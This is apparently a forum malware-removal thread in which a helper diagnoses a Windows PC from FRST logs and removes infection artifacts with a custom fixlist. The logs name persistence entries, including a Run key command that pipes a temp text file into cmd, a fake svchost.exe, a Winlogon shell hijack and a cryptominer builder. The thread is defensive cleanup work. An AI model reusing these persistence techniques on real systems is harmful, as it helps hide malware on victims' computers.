Check "winmgmt" service or repair WMI.


==================== Faulty Device Manager Devices =============

Name: memudrv
Description: memudrv
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: memudrv
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.

Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name: MTP USB Device
Description: MTP USB Device
Class Guid: {eec5ad98-8080-425f-922a-dabf3de3f69a}
Manufacturer: (Standard MTP Device)
Service: WUDFRd
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name: MediaTek DA USB VCOM (Android) (COM5)
Description: MediaTek DA USB VCOM (Android)
Class Guid: {4d36e978-e325-11ce-bfc1-08002be10318}
Manufacturer: MediaTek Inc.
Service: wdm_usb
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name: MediaTek USB Port (COM6)
Description: MediaTek USB Port
Class Guid: {4d36e978-e325-11ce-bfc1-08002be10318}
Manufacturer: MediaTek Inc.
Service: wdm_usb
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name: Android Gadget VCOM Driver (COM15)
Description: Android Gadget VCOM Driver
Class Guid: {4d36e978-e325-11ce-bfc1-08002be10318}
Manufacturer: MediaTek Inc.
Service: usbser
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name: MediaTek DA USB VCOM Port (COM16)
Description: MediaTek DA USB VCOM Port
Class Guid: {4d36e978-e325-11ce-bfc1-08002be10318}
Manufacturer: MediaTek Inc.
Service: usbser
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (11/01/2018 01:18:32 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine CoCreateInstance. hr = 0x80070422, The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
.


Operation:
Instantiating VSS server

Error: (11/01/2018 01:18:32 PM) (Source: VSS) (EventID: 13) (User: )
Description: Volume Shadow Copy Service information: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name IVssCoordinatorEx2 cannot be started. [0x80070422, The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
]


Operation:
Instantiating VSS server

Error: (11/01/2018 01:15:32 PM) (Source: Microsoft Security Client Setup) (EventID: 100) (User: Betts-PC)
Description: HRESULT:0x80070656
Description:Cannot complete the Security Essentials installation. An error has prevented the Security Essentials setup wizard from completing successfully. Please restart your computer and try again. Error code:0x80070656. Error opening installation log file. Verify that the specified log file location exists and that you can write to it.

Error: (11/01/2018 01:15:23 PM) (Source: MsiInstaller) (EventID: 1043) (User: NT AUTHORITY)
Description: Failed to end a Windows Installer transaction d:\1698daab692073d0fa209f086f8452\amd64\epp.msi. Error 1622 occurred while ending the transaction.

Error: (11/01/2018 01:14:59 PM) (Source: Microsoft Security Client Setup) (EventID: 100) (User: Betts-PC)
Description: HRESULT:0x80070656
Description:Cannot complete the Security Essentials installation. An error has prevented the Security Essentials setup wizard from completing successfully. Please restart your computer and try again. Error code:0x80070656. Error opening installation log file. Verify that the specified log file location exists and that you can write to it.

Error: (11/01/2018 01:14:52 PM) (Source: MsiInstaller) (EventID: 1043) (User: NT AUTHORITY)
Description: Failed to end a Windows Installer transaction d:\12abb302ab5599c2e594a7\amd64\epp.msi. Error 1622 occurred while ending the transaction.

Error: (11/01/2018 01:13:18 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\Windows\system32\msiexec.exe /V; Description = Removed Oracle VM VirtualBox 4.3.12_ZZZZ; Error = 0x80042302).

Error: (11/01/2018 01:13:18 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine CoCreateInstance. hr = 0x80070422, The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
.


System errors:
=============
Error: (11/01/2018 12:28:54 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {ABC01078-F197-4B0B-ADBC-CFE684B39C82} did not register with DCOM within the required timeout.

Error: (11/01/2018 10:29:51 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.

Error: (11/01/2018 10:23:51 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
hQjWNzqD
kzeXHiXd
pzLPPFej

Error: (11/01/2018 10:23:38 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The memudrv service failed to start due to the following error:
The system cannot find the path specified.

Error: (10/31/2018 12:04:01 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.

Error: (10/31/2018 11:57:19 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
hQjWNzqD
kzeXHiXd
pzLPPFej

Error: (10/31/2018 11:57:14 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The memudrv service failed to start due to the following error:
The system cannot find the path specified.

Error: (10/30/2018 09:54:24 PM) (Source: nvlddmkm) (EventID: 13) (User: )
Description: Event-ID 13


Windows Defender:
===================================
Date: 2017-04-19 18:17:22.080
Description:
Windows Defender has detected spyware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win32/Virtumonde.B&threatid=17377
Name:TrojanDropper:Win32/Virtumonde.B
ID:17377
Severity:Severe
Category:Trojan Dropper
Path Found:file:C:\Users\Betts\AppData\Roaming\Spotify\Spotify.exe;process:pid:7220;process:pid:7440;process:pid:7712;process:pid:7780;regkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\Spotify;regkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Spotify;runkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\Spotify;uninstall:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Spotify
Detection Type:Concrete
Detection Source:System
Status:Unknown
Process Name:

Date: 2017-04-19 18:17:18.991
Description:
Windows Defender has detected spyware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win32/Virtumonde.B&threatid=17377
Name:TrojanDropper:Win32/Virtumonde.B
ID:17377
Severity:Severe
Category:Trojan Dropper
Path Found:file:C:\Users\Betts\AppData\Roaming\Spotify\Spotify.exe;process:pid:7220;process:pid:7712;process:pid:7780;regkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\Spotify;regkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Spotify;runkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\Spotify;uninstall:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Spotify
Detection Type:Concrete
Detection Source:System
Status:Unknown
Process Name:

Date: 2017-04-19 18:17:16.044
Description:
Windows Defender has detected spyware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win32/Virtumonde.B&threatid=17377
Name:TrojanDropper:Win32/Virtumonde.B
ID:17377
Severity:Severe
Category:Trojan Dropper
Path Found:file:C:\Users\Betts\AppData\Roaming\Spotify\Spotify.exe;process:pid:7220;process:pid:7712;regkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\Spotify;regkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Spotify;runkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\Spotify;uninstall:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Spotify
Detection Type:Concrete
Detection Source:System
Status:Unknown
Process Name:

Date: 2017-04-19 18:17:12.821
Description:
Windows Defender has detected spyware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win32/Virtumonde.B&threatid=17377
Name:TrojanDropper:Win32/Virtumonde.B
ID:17377
Severity:Severe
Category:Trojan Dropper
Path Found:file:C:\Users\Betts\AppData\Roaming\Spotify\Spotify.exe;process:pid:7712;regkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\Spotify;regkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Spotify;runkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\Spotify;uninstall:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Spotify
Detection Type:Concrete
Detection Source:System
Status:Unknown
Process Name:

Date: 2017-04-19 17:56:15.915
Description:
Windows Defender has detected spyware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win32/Virtumonde.B&threatid=17377
Name:TrojanDropper:Win32/Virtumonde.B
ID:17377
Severity:Severe
Category:Trojan Dropper
Path Found:file:C:\Users\Betts\AppData\Roaming\Spotify\Spotify.exe;regkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\Spotify;regkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Spotify;runkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\Spotify;uninstall:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Spotify
Detection Type:Concrete
Detection Source:System
Status:Unknown
Process Name:

CodeIntegrity:
===================================

Date: 2018-05-03 21:38:12.843
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\qcusbser.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-05-03 21:38:12.816
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\qcusbser.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-05-03 21:38:12.492
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\qcusbser.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-05-03 21:38:12.480
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\qcusbser.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-02-07 17:09:43.400
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\nxusbf.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-02-07 17:09:43.398
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\nxusbf.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-02-07 17:09:43.113
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\nxusbh.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-02-07 17:09:43.111
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\nxusbh.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

Processor: Intel(R) Core(TM) i7-3770 CPU @ 3.40GHz
Percentage of memory in use: 67%
Total physical RAM: 8159.14 MB
Available physical RAM: 2658.27 MB
Total Virtual: 16316.46 MB
Available Virtual: 10294.55 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:401.27 GB) (Free:97.08 GB) NTFS
Drive d: () (Fixed) (Total:530.14 GB) (Free:403.46 GB) NTFS
Drive e: (2018103013480639) (CDROM) (Total:0.22 GB) (Free:0 GB) CDFS

\\?\Volume{0524b40c-b028-11e2-8930-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 00000001)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=401.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=530.1 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

Broni

Malware Annihilator
I strongly suggest you obtain a legit Windows version as soon as possible.

Uninstall the following unwanted programs:

Online Weather
PC Data App


Download the attached fixlist.txt file and save it to the Desktop.
NOTE: It's important that both files, FRST and fixlist.txt, are in the same location, or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Run FRST (FRST64) and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it in your reply.

Broni

Malware Annihilator
Fix result of Farbar Recovery Scan Tool (x64) Version: 24.10.2018
Ran by Betts (02-11-2018 13:52:35) Run:1
Running from C:\Users\Betts\Desktop
Loaded Profiles: Betts (Available Profiles: Betts)
Boot Mode: Normal
==============================================

fixlist content:
*****************
() C:\Users\Betts\AppData\Local\Temp\svchost.exe
C:\Users\Betts\AppData\Local\Temp\svchost.exe
HKLM\...\Run: [Autodesk Sync] => [X]
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [svchost.exe] => C:\Users\Betts\AppData\Local\Temp\svchost.exe .. [169984 2018-11-01] () <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [csrss] => cmd /c type C:\Users\Betts\AppData\Local\Temp\csrss.txt | cmd <==== ATTENTION
C:\Users\Betts\AppData\Local\Temp\csrss.txt
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [6879fe793de5f826544fc9bd3b3ae212] => C:\ProgramData\audio.exe .. [285184 2018-08-22] (Microsoft Corporation) <==== ATTENTION
C:\ProgramData\audio.exe
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [svchost.exe] => C:\Users\Betts\AppData\Local\Temp\svchost.exe .. [169984 2018-11-01] () <==== ATTENTION
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\CurrentVersion\Windows: [Load] C:\ProgramData\msanis.exe <==== ATTENTION
C:\ProgramData\msanis.exe
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\MountPoints2: {7f7bd46c-632b-11e3-acad-c8600099836d} - F:\bootstrap.exe
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Winlogon: [Shell] explorer.exe,"C:\Windows\SysWOW64\Windows Server\wserver.exe" <==== ATTENTION
C:\Windows\SysWOW64\Windows Server\wserver.exe
ShellExecuteHooks: No Name - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - -> No File
ShellExecuteHooks-x32: No Name - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - -> No File
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WinUrl.url -> URL: file:///C:\ProgramData\{97eec164-d800-cec2-f20c-1101c2f4c01b}\hostdl.exe
C:\ProgramData\{97eec164-d800-cec2-f20c-1101c2f4c01b}\hostdl.exe
Startup: C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6879fe793de5f826544fc9bd3b3ae212.exe [2018-08-22] ()
C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6879fe793de5f826544fc9bd3b3ae212.exe
Startup: C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe [2018-11-01] () <==== ATTENTION
GroupPolicy: Restriction - Chrome <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
BHO: No Name -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> No File
BHO-x32: No Name -> {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} -> No File
BHO-x32: No Name -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> No File
Toolbar: HKLM - No Name - {97ab88ef-346b-4179-a0b1-7445896547a5} - No File
Toolbar: HKLM-x32 - No Name - {97ab88ef-346b-4179-a0b1-7445896547a5} - No File
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL No File
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL No File
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - No File
FF Extension: (No Name) - C:\Program Files (x86)\Netscape\Navigator 9\extensions\inspector@mozilla.org [not found]
FF Extension: (No Name) - C:\Program Files (x86)\Netscape\Navigator 9\extensions\netscape9migrator@flock.com [not found]
FF HKLM\...\Firefox\Extensions: [webrootsecure@webroot.com] - C:\ProgramData\WRData\PKG\FF_WEBEX => not found
FF HKLM-x32\...\Firefox\Extensions: [webrootsecurewebextensions@webroot.com] - C:\ProgramData\WRData\PKG\FIREFOX\WebrootSecure_SocketServer => not found
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [No File]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [No File]
FF Plugin-x32: @kuaiyong.yrtd.com,version=1.0.1.1 -> C:\Program Files (x86)\kuaiyong\np_kyplugin.dll [No File]
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL [No File]
FF Plugin-x32: @t.garena.com/garenatalk -> C:\Program Files (x86)\Garena Plus\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [No File]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\secure_cert.js [2018-08-22] <==== ATTENTION
C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake
C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf
C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl
C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\ooblpjoncpjmbncgocjlnannofkjjhnp
S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X]
S3 GGSAFERDriver; \??\C:\Program Files (x86)\Garena Plus\Room\safedrv.sys [X]
S3 gkernel; \??\C:\Users\Betts\AppData\Local\Temp\gkernel.sys [X] <==== ATTENTION
S0 hQjWNzqD; System32\drivers\hQjWNzqD.sys [X]
S0 kzeXHiXd; System32\drivers\kzeXHiXd.sys [X]
S2 memudrv; \??\D:\Program Files\Microvirt\MEmuHyperv\MEmuDrv.sys [X]
S0 pzLPPFej; System32\drivers\pzLPPFej.sys [X]
U0 SR; no ImagePath
U2 srservice; no ImagePath
2018-08-22 19:22 - 2018-10-29 12:36 - 000017529 _____ () C:\ProgramData\1.exe
2018-08-23 19:35 - 2018-10-29 12:36 - 000017529 _____ () C:\ProgramData\2.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000285184 ____H (Microsoft Corporation) C:\ProgramData\audio.exe
2018-08-22 20:32 - 2018-08-18 06:21 - 000603352 _____ (Alexander Roshal) C:\ProgramData\xhhjtiwtw.exe
2018-01-17 15:58 - 2018-01-17 19:17 - 001105920 _____ (Microsoft) C:\ProgramData\XMR Builder.exe
2018-10-03 00:56 - 2018-10-03 00:56 - 000000033 _____ () C:\Users\Betts\AppData\Roaming\AdobeWLCMCache.dat
2016-08-13 10:40 - 2016-08-13 11:57 - 000002032 _____ () C:\Users\Betts\AppData\Roaming\droid4xinstaller.log
2018-01-18 23:28 - 2018-11-01 13:18 - 003344536 _____ () C:\Users\Betts\AppData\Roaming\msconfig.ini
2013-12-23 18:06 - 2016-03-25 22:32 - 000045270 _____ () C:\Users\Betts\AppData\Roaming\room_v3.dat
2017-03-25 22:55 - 2018-10-20 12:04 - 000000600 _____ () C:\Users\Betts\AppData\Roaming\winscp.rnd
2018-08-22 19:27 - 2018-08-22 19:27 - 000011568 _____ () C:\Users\Betts\AppData\Local\InstallationConfiguration.xml
2018-08-22 19:27 - 2018-08-22 19:27 - 000140800 _____ () C:\Users\Betts\AppData\Local\installer.dat
2018-06-12 22:24 - 2018-06-12 22:24 - 000004096 ____H () C:\Users\Betts\AppData\Local\keyfile3.drm
2018-10-27 08:05 - 2018-10-27 08:05 - 000000218 _____ () C:\Users\Betts\AppData\Local\recently-used.xbel
2017-12-07 19:22 - 2018-01-13 18:27 - 000007608 _____ () C:\Users\Betts\AppData\Local\Resmon.ResmonCfg
2018-08-22 19:27 - 2018-08-22 19:27 - 001413120 _____ () C:\Users\Betts\AppData\Local\sham.db
2014-08-31 10:30 - 2014-08-31 10:30 - 000000000 _____ () C:\Users\Betts\AppData\Local\{7018210F-C569-4660-8EC7-AF4BD353B0B6}
2017-11-15 18:57 - 2017-11-15 18:57 - 000000345 _____ () C:\Users\Betts\AppData\Local\~Report2.txt
C:\Users\Betts\AppData\Local\Temp\svchost.exe ..
C:\ProgramData\audio.exe ..
C:\Users\Betts\AppData\Roaming\msconfig.ini
2018-08-22 20:31 - 2018-08-22 20:31 - 000552448 _____ () C:\Users\Betts\AppData\Local\Temp\11AD.tmp.exe
2018-08-22 19:32 - 2018-08-22 19:32 - 000495104 _____ () C:\Users\Betts\AppData\Local\Temp\1B4C.tmp.exe
2018-08-22 20:31 - 2018-08-22 20:31 - 000185104 _____ () C:\Users\Betts\AppData\Local\Temp\222.tmp.exe
2018-08-22 19:26 - 2018-08-22 21:06 - 000079872 _____ () C:\Users\Betts\AppData\Local\Temp\23435.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000163328 _____ () C:\Users\Betts\AppData\Local\Temp\2FA4.tmp.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000110592 _____ () C:\Users\Betts\AppData\Local\Temp\317.tmp.exe
2018-08-22 19:20 - 2018-08-22 19:26 - 000001020 _____ () C:\Users\Betts\AppData\Local\Temp\419204dddd.exe
2018-08-22 19:26 - 2018-08-22 21:06 - 010522026 _____ () C:\Users\Betts\AppData\Local\Temp\allradio_4.27_portable.exe
2018-08-22 19:28 - 2018-08-22 19:29 - 001004032 _____ () C:\Users\Betts\AppData\Local\Temp\AmazonShoppingAssistant.exe
2018-08-22 19:26 - 2018-08-22 19:26 - 000020480 _____ (CatX) C:\Users\Betts\AppData\Local\Temp\cubesta.exe
2018-08-22 19:32 - 2018-08-22 19:32 - 041735680 _____ (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\DBBC.tmp.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000163840 _____ () C:\Users\Betts\AppData\Local\Temp\F83D.tmp.exe
2018-08-22 19:19 - 2018-08-22 19:19 - 004009147 _____ () C:\Users\Betts\AppData\Local\Temp\fag.exe
2018-08-22 19:19 - 2018-08-22 19:19 - 000622592 _____ (DianneLMeans@armyspy.com ) C:\Users\Betts\AppData\Local\Temp\fagw.exe
2018-04-29 14:05 - 2018-07-24 14:30 - 000450880 _____ (Garena Online ) C:\Users\Betts\AppData\Local\Temp\Garena.exe
2018-08-22 19:28 - 2018-08-22 19:28 - 000420191 _____ ( ) C:\Users\Betts\AppData\Local\Temp\global_installer.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 002291565 _____ (Godogic ) C:\Users\Betts\AppData\Local\Temp\JavaSetup_2179753812.exe
2018-08-22 19:28 - 2018-08-22 19:28 - 000176912 _____ () C:\Users\Betts\AppData\Local\Temp\ketup.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000163840 _____ () C:\Users\Betts\AppData\Local\Temp\KYlXSzGXn6oMeeHruwfwlWqCS.exe
2018-08-22 19:27 - 2018-08-22 21:10 - 000484352 _____ () C:\Users\Betts\AppData\Local\Temp\lame_enc.dll
2018-08-22 21:03 - 2018-08-21 04:01 - 000858912 _____ (Malwarebytes) C:\Users\Betts\AppData\Local\Temp\mb-clean.exe
2018-08-22 21:03 - 2018-08-22 21:00 - 082624400 _____ (Malwarebytes ) C:\Users\Betts\AppData\Local\Temp\mb3-setup-consumer-3.5.1.2522-1.0.421-1.0.6439.exe
2018-08-22 19:19 - 2018-08-22 19:19 - 002951680 _____ (�Ludekolfoidgu kyosehicell ) C:\Users\Betts\AppData\Local\Temp\MediaPlay.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000181520 _____ () C:\Users\Betts\AppData\Local\Temp\merun.exe
2018-08-22 19:29 - 2018-08-22 19:29 - 000290304 _____ () C:\Users\Betts\AppData\Local\Temp\MPlayer1006.exe
2018-08-22 19:29 - 2018-08-22 19:29 - 000000000 _____ () C:\Users\Betts\AppData\Local\Temp\novol.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00000.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00001.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00002.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00003.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00004.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00005.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00006.exe
2018-08-22 19:28 - 2018-08-22 19:28 - 000343552 _____ () C:\Users\Betts\AppData\Local\Temp\RegOrganizer.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 002294272 _____ (TODO: <Company name>) C:\Users\Betts\AppData\Local\Temp\setup.exe
2018-08-22 19:27 - 2018-08-22 19:28 - 001323008 _____ (TigerTrade ) C:\Users\Betts\AppData\Local\Temp\sprun.exe
2018-10-06 21:04 - 2018-11-01 10:24 - 000169984 _____ () C:\Users\Betts\AppData\Local\Temp\svchost.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000339968 _____ () C:\Users\Betts\AppData\Local\Temp\TigerTrade.exe
